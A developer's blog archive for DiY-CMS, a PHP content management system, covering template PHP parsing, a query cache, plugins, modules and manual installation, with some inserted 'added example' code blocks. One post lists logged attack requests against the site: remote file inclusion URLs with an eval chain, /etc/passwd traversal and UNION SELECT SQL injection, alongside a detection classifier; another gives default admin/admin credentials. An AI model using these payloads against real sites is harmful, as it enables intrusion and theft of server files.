

New DiY-CMS features 2: adding code to templates and improving update system

  By: admin   Date Added: Wednesday 09-02-2011 02:46 pm

In my last blog I talked about the new updates that I developed for DiY-CMS. I talked about the cache system, and in this blog I will be talking about the other two new improvements, namely: adding PHP code to main templates and improving the update system in the control panel.

One of the most needed features was to allow code to be inserted and parsed in the templates of DiY-CMS themes. Adding code provides great flexibility for designing and creating dynamic themes. I have changed the way that main templates are parsed within DiY-CMS. The eval() function is no longer used for parsing, as it is frowned upon by many developers due to the security risks it might pose, as well as its inability to parse PHP code inside templates (in the case of DiY-CMS) without a number of unnecessary modifications to the CMS.

So what is the benefit of enabling code parsing within main templates? The main advantage is that creating a theme becomes easier and more dynamic. For instance, one could use conditional statements (among the most commonly used statements in themes) to change a colour, a column or practically anything else. One can even add functions or any snippet of code one likes to the theme being created. The second advantage is that I am working on developing theme settings, where this change comes in handy: a designer would add settings to his theme, a general user could modify these settings through an interface, and the designer would incorporate PHP code to modify the look and feel of the theme based on these settings.

Since PHP code is now accepted within main templates, one can use the standard PHP file inclusion function rather than the DiY-CMS style. For instance, to include the file ‘blocks/tags.block.php’, instead of using:


<!--INC dir="blocks" file="tags.block.php" -->

One could use this style:

<?php include('blocks/tags.block.php'); ?>

I have mentioned earlier that the eval() function is no longer used, and that means that variables inside the main templates will not be rendered correctly (variables are the words preceded by the dollar sign $). For example, $index_middle will not render correctly and it needs to be enclosed in PHP tags like so:

<?php echo $index_middle; ?>
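
Added example (not DiY-CMS's own code): one way to render a main template by including it instead of passing it to eval(), while keeping the template path inside the theme folder and escaping plain-text values on output. The names render_template() and e(), the demo theme folder and the sample values are assumptions made for illustration.

```php
<?php
// Hypothetical renderer for illustration; not taken from DiY-CMS.
function render_template(string $themeDir, string $name, array $vars): string
{
    // Template names are plain identifiers: no "../", no "http://".
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        throw new InvalidArgumentException('bad template name');
    }
    // Resolve symlinks and confirm the file really lives under the theme.
    $base = realpath($themeDir);
    $file = realpath($themeDir . '/' . $name . '.php');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template not found in theme directory');
    }
    // Isolated scope: the template sees only the variables passed in.
    $render = static function (string $__file, array $__vars): string {
        extract($__vars, EXTR_SKIP);
        ob_start();
        try {
            include $__file;
            return ob_get_contents();
        } finally {
            ob_end_clean();
        }
    };
    return $render($file, $vars);
}

// HTML-escape helper for values that are text rather than markup.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Constructed demo: write a small template into a temp theme and render it.
$theme = sys_get_temp_dir() . '/diy_theme_demo';
@mkdir($theme);
file_put_contents(
    $theme . '/main.php',
    "<h1><?php echo e(\$site_title); ?></h1>\n<?php echo \$index_middle; ?>\n"
);

echo render_template($theme, 'main', [
    'site_title'   => 'Tom & Jerry <blog>',                    // text: escaped
    'index_middle' => '<p>already-rendered module output</p>', // markup: as is
]);
```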

I have updated all the themes in the download center to conform to the new system, and – hopefully – you will not have problems installing or running them on your website.
The second update I will be talking about in this blog is the improvement of the update system in the control panel. I have made a number of improvements to the underlying code of the system and modified it to retrieve data in JSON format from the DiY-CMS official website. This will allow for a more efficient and smooth update process. I also improved the system to accept ZIP files. Using this feature, the website administrator will be able to install a bunch of updates in one click. In order for this feature to work you need the ZIP Library installed on your hosting server. It is mostly installed, but if it is not you can ask your hosting provider to install it for you.
I hope that these features will be of great help to all the users of DiY-CMS, and I hope to hear your opinions in the comments.


Tags: updates, features, php-code

New DiY-CMS features 1: reducing queries by 50-85%

  By: admin   Date Added: Wednesday 09-02-2011 01:46 pm

After I finished programming my first app for Facebook - Friends Stat, I started thinking about new ways to improve DiY-CMS. I have many ideas to develop, but there are three features among them which I believe are important. They are: a cache system to minimise MySQL queries, adding PHP code into main templates and improving the update system in the DiY-CMS control panel.

I will explain the first feature in this blog and then talk about the rest in later blogs.
The cache system was developed to ease the process of retrieving data from the database. In other words, the cache system saves the results of repetitive queries that do not change often into files and then retrieves the data from these files rather than querying the database again and again. As you might have guessed by now, this process will reduce the load on the database and increase the CMS performance.

In DiY-CMS there are a number of queries that do not change often, such as general settings, module settings, plugin details, themes, templates and other queries. The cache system will save the results of each one of these queries to a single file and place it in the cache folder. Once a query is requested in the front-end, DiY-CMS will check if there is a cache file relevant to that query and retrieve the results saved in it; otherwise the query will run normally.

Cache files do not have expiry data, so files would remain for an unlimited period of time. What if I make changes to settings, theme or templates? In this case the relevant cache file would be updated automatically once changes occur in the control panel. Also, you can remove cache files manually from the Cache folder any time you wish and DiY-CMS will create new cache files.

This feature reduces MySQL queries and therefore increases overall performance. In some pages of DiY-CMS queries reached as little as 1 query per page. Certainly the number of queries cached would be different from one module to another and from one page to another, but on average MySQL queries have been minimised by 50-85%. See chart below.



Furthermore, you can use this system to cache queries that you might use in modules, plugins or blocks you develop for DiY-CMS. Implementing the cache is easy and requires three functions: one to create the cache file, a second to check that the file exists and a third to retrieve its data.

Say we have this query that we want to cache:

$result = $diy_db->query("SELECT variable,value FROM diy_settings");


You would place this code where the data of diy_settings is updated:

// Query database table
$result = $diy_db->query("SELECT variable,value FROM diy_settings");
$array = array();
while ($row = $diy_db->dbarray($result)) {
    $key = $row['variable'];
    $array[$key] = $row['value'];
}

// create a cache file and save data into it
$diy_db->create_query_cache_file('global_settings', $array);


Notice that the create_query_cache_file() function takes two parameters: the first one is the file name and the second one is the query data that needs to be cached.

Then you would use this code to check for the file and retrieve its data:

// check if file exists
$cache = $diy_db->check_query_cache_file('global_settings');
if ($cache) {
    // if file exists retrieve its data and place it in a variable
    $array = $diy_db->get_query_cache_file('global_settings');
} else {
    // if file does not exist proceed with the query as normal
    $result = $diy_db->query("SELECT variable,value FROM diy_settings");

    $array = array();
    while ($row = $diy_db->dbarray($result)) {
        $key = $row['variable'];
        $array[$key] = $row['value'];
    }
}
// here $array data can be used as wished


In the last code snippet there are two important functions: the first is check_query_cache_file(), which checks whether the file exists, and the second is get_query_cache_file(), which retrieves data from the cache file. Both functions take one parameter, the file name that we created using the create_query_cache_file() function.
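
Added example (not DiY-CMS's own implementation): a file-backed cache offering the same create, check and retrieve operations, written so that cache names cannot escape the cache folder, readers never see a half-written file, and reading a cache file cannot execute code. The class name FileQueryCache, its method names, the JSON storage format and the demo folder are assumptions.

```php
<?php
// Hypothetical stand-in for the cache functions; not taken from DiY-CMS.
final class FileQueryCache
{
    private string $dir;

    public function __construct(string $dir)
    {
        if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
            throw new RuntimeException('cannot create cache directory');
        }
        $this->dir = $dir;
    }

    // Cache names are fixed identifiers such as 'global_settings'; refusing
    // anything else keeps a crafted name from leaving the cache folder.
    private function path(string $name): string
    {
        if (!preg_match('/^[a-z0-9_]{1,64}$/', $name)) {
            throw new InvalidArgumentException('bad cache name');
        }
        return $this->dir . '/' . $name . '.json';
    }

    // Write to a temp file, then rename it into place (atomic on one
    // filesystem). JSON holds data only, unlike serialized objects or PHP.
    public function create(string $name, array $data): void
    {
        $target = $this->path($name);
        $tmp    = tempnam($this->dir, 'tmp');
        file_put_contents($tmp, json_encode($data, JSON_THROW_ON_ERROR));
        rename($tmp, $target);
    }

    // Combines "check" and "retrieve": null means missing or corrupt,
    // and the caller then runs the database query as usual.
    public function get(string $name): ?array
    {
        $file = $this->path($name);
        $data = is_file($file) ? json_decode(file_get_contents($file), true) : null;
        return is_array($data) ? $data : null;
    }
}

// Constructed demo data standing in for rows of diy_settings.
$cache = new FileQueryCache(sys_get_temp_dir() . '/diy_cache_demo');
$cache->create('global_settings', ['site_title' => 'Demo', 'theme' => 'default']);
var_dump($cache->get('global_settings'));  // cache hit
var_dump($cache->get('module_settings'));  // cache miss
try {
    $cache->get('../admin/conf');          // traversal attempt in the name
} catch (InvalidArgumentException $ex) {
    echo 'rejected: ', $ex->getMessage(), "\n";
}
```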

I hope that this blog provides some insights into the features of DiY-CMS and how to use them.

In the next blog I will explain the rest of the features.


Tags: updates-diy-cms-mysql

Yeah! Preventing more than 3000 hacking attempts

  By: admin   Date Added: Wednesday 03-11-2010 09:27 am

Security is one of the most important criteria in any script one would like to use. In this post I will talk about security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts; SQL injection attempts through forms, for example, are prevented but not recorded, for a number of reasons.

Attempt examples:
Several methods were used to hack into DiY-CMS; they include remote file inclusion, SQL injection and attempts to access root folders and files.
Here are a few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1
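
Added example (not DiY-CMS's own filter): detection logic that labels a request URI with the three attack classes listed above, next to an allowlist check for the mod parameter. The function names classify_request() and is_valid_module(), the patterns and the shortened sample requests are assumptions constructed from the recorded requests in this post.

```php
<?php
// Hypothetical classifier for illustration; not taken from DiY-CMS.
function classify_request(string $uri): array
{
    $labels  = [];
    $decoded = rawurldecode($uri);
    $pos     = strpos($uri, '?');
    $query   = $pos === false ? '' : substr($uri, $pos + 1);

    // Remote file inclusion: a parameter whose value is itself a URL.
    foreach (explode('&', $query) as $pair) {
        $eq    = strpos($pair, '=');
        $value = $eq === false ? '' : rawurldecode(substr($pair, $eq + 1));
        if (preg_match('#^\s*(?:https?|ftp)://#i', $value)) {
            $labels['remote_file_inclusion'] = true;
        }
    }
    // Directory traversal, and the %00 null byte used to cut off a suffix
    // that the application appends to the file name.
    if (strpos($decoded, '../') !== false || strpos($decoded, "\0") !== false) {
        $labels['path_traversal'] = true;
    }
    // SQL injection markers seen in the samples: UNION [ALL] SELECT and
    // probes of information_schema.
    $sqli = '/\bunion\s+(?:all\s+)?select\b|\binformation_schema\b/i';
    if (preg_match($sqli, $decoded)) {
        $labels['sql_injection'] = true;
    }
    return array_keys($labels);
}

// Mitigation side: "mod" names a module, so accept only a plain identifier.
function is_valid_module(string $mod): bool
{
    return preg_match('/^[A-Za-z0-9_]{1,32}$/', $mod) === 1;
}

// Constructed samples, shortened from the requests quoted above.
$samples = [
    '/mod.php?mod=http://SITE-NAME.example/admin/index.txt?',
    '/mod.php?mod=../../../../etc/passwd%00',
    '/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null%20where%20"x"="x',
    '/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0/*',
    '/mod.php?mod=download&modfile=view_file&downid=26',
];
foreach ($samples as $uri) {
    parse_str(substr(strstr($uri, '?'), 1), $params);
    printf("%-22s mod %s  %s\n",
        implode(',', classify_request($uri)) ?: 'clean',
        is_valid_module($params['mod'] ?? '') ? 'accepted' : 'rejected',
        $uri);
}
```

The fourth sample carries a valid module name; its injection sits in the start parameter, so each numeric parameter needs its own integer validation in addition to the check on mod.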


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:



And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS is when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.


Tags: prevent-hacking-

How to install DiY-CMS manually

  By: admin   Date Added: Thursday 14-10-2010 03:13 am

If you ever run into an issue during the installation process of DiY-CMS, this blog will solve your problems using the good old manual way. In this blog I will explain how to install DiY-CMS on the local server on your website manually and without the built-in installation wizard.


First of all we need to create a database using phpMyAdmin. Open phpMyAdmin and then create a database as shown in image 1 below. Make sure that you select the utf-8 encoding for both the database encoding and the connection collation. This is to ensure that DiY-CMS will function correctly when displaying non-English characters or using a different language such as Arabic, Hebrew, Chinese or other languages.


Image 1



Second step: click on import at the top of the page. Then import this file “install/install.sql” to the database as shown in image 2.



Image 2




Third step: Remove install folder from the DiY-CMS folder.

Fourth step: open the file “admin/conf.php” and replace the values between the curly brackets {} (along with the {} themselves) with the appropriate values:

$CONF['dbname'] = "{server_db}"; // Database name
$CONF['dbuser'] = "{server_un}"; // Database user
$CONF['dbpword'] = "{server_pass}"; // Database password

$CONF['site_path'] = "{path}"; // Path to your site
$CONF['upload_path'] = "{uppath}"; // Path to the upload folder
$CONF['site_url'] = '{sitelink}'; // website URL
$CONF['site_mail'] = "{sitemail}"; // Website Email
$CONF['site_title'] = "{sitetitle}"; // Website Title
$CONF['cookie_domain'] = '{domain}'; // Cookie domain


Final Step: At this stage you would be able to login to your website using these credentials:
Username: admin
Password: admin

Change your password to whatever you want then customize the CMS to your needs.

I hope this tutorial was useful.


Tags: install, manual

Finally, a DiY-CMS / vBulletin bridge

  By: admin   Date Added: Friday 24-09-2010 01:04 pm



Finally, I was able to create a bridge between DiY-CMS and vBulletin forum. I designed the bridge in the form of a plug-in so it is easier for administrators to control it. The plug-in would unify registration and login in DiY-CMS and vBulletin forums.

The plug-in will:
1- Unify registration. User would have to register once using the same registration form.
2- Unify login, through DiY-CMS only.
3- Unify logout, through DiY-CMS only.
4- Import users who registered through vBulletin forms.

Installation:
1- Download plug-in from this link: http://www.diy-cms.com/mod.php?mod=download&modfile=view_file&downid=30

2- Extract the contents of the zip file and then upload the folder to the plugins folder in your website.

3- Open config.php inside the plug-in folder and edit this line:
define('FORUMPATH', 'D:/xampp/htdocs/vb/'); // path to your forum 


Change D:/xampp/htdocs/vb/ to the path of the vBulletin forums on your website.

4- Install the plug-in through the admin panel. In the plug-in setup tick the users module only. You can select other modules; however, this will increase the number of database queries, and the plug-in is programmed to work only on the users module (since that is all it needs to function correctly).

5- In the plug-in settings you will see the following:



Select the new users group. Link DiY-CMS groups to the corresponding vBulletin forum groups.

Import users to DiY-CMS by clicking on the green button. You have to repeat the last step (the importing part) from time to time in order to import users who register through vBulletin.

Alternatively you can disable registration in vBulletin and enable it only through DiY-CMS.


Tags: vbulltein-bridge, diy-cms

Blog module for DiY-CMS

  By: admin   Date Added: Tuesday 31-08-2010 01:39 pm


Hi
As promised, I made the blog module available for download. This website is a live example of the blog module.

Module features:
- Unlimited categories and subcategories.
- Groups-based permissions for adding and editing posts.
- ability to add tags to blogs.
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_27


Tags: blog, module, diy-cms

Video module 1.0

  By: admin   Date Added: Wednesday 28-07-2010 04:25 pm


Hi
Today I present you with the video module. It enables users to add videos to your website. Users can add videos either by uploading files from their computers or adding the embed link using any of the video sharing websites.

Module features:
- Unlimited categories and subcategories.
- Multiple video upload at the same time.
- Set video types allowed for upload
- Using group settings you can set the size of video uploaded
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_29


Tags: video, cms

CK-Editor Plugin

  By: admin   Date Added: Thursday 22-07-2010 09:25 am

This plugin will add a WYSIWYG (what you see is what you get) editor or a visual HTML editor. It replaces the TinyMCE editor (the default editor for DiY-CMS) with the CKEditor with many options.

Here is the editor image in action with Standard type selected:



First to install the plugin you need to upload the folder to the plugins directory in DiY-CMS root folder. Then you can install it from the admin area by going to plugins sections and then click on the install icon.

Second, you may modify the plugin settings as you need.
You can modify the skin, the toolbar type, the toolbar location and many more.

Here is the setting image:




You can download the plugin from this link:
http://www.diy-cms.com/download/view_file/downid_28


Tags: ckeditor, plugin

Friendly Links plugin

  By: admin   Date Added: Thursday 15-07-2010 09:57 am



Hi
I have programmed a new plugin for DiY-CMS. It basically converts most of the links in DiY-CMS from dynamic to static.

So links like this:
http://www.diy-cms.com/mod.php?mod=download&modfile=view_file&downid=26

would be converted to this:
http://www.diy-cms.com/download/view_file/downid_26


To download the plugin follow any of the links above :)

Hopefully in the next blogs I will be talking about how to write a plugin for DiY-CMS using the hooks system.


Tags: plugins, firendly-links, diy-cms

Gallery module for diy-cms

  By: admin   Date Added: Thursday 01-07-2010 12:55 pm

Hi
A couple of weeks ago I started planning to program three modules for DiY-CMS which I thought are necessary for the completion of the CMS. They are gallery, audio and video modules.

Here is the first one, the gallery module. To download it Click Here.

Features:
- Unlimited categories and subcategories.
- Multiple images upload at the same time.
- Three types of listing: Title & photo, Photo Only or Title only.
- Add Copyright text
- Customise copyright colour and position.
- and many more.

Here is the image of the image listing in a category with photo and title type:


and this is the screenshot for viewing a single photo:


Tags: gallery, diycms, module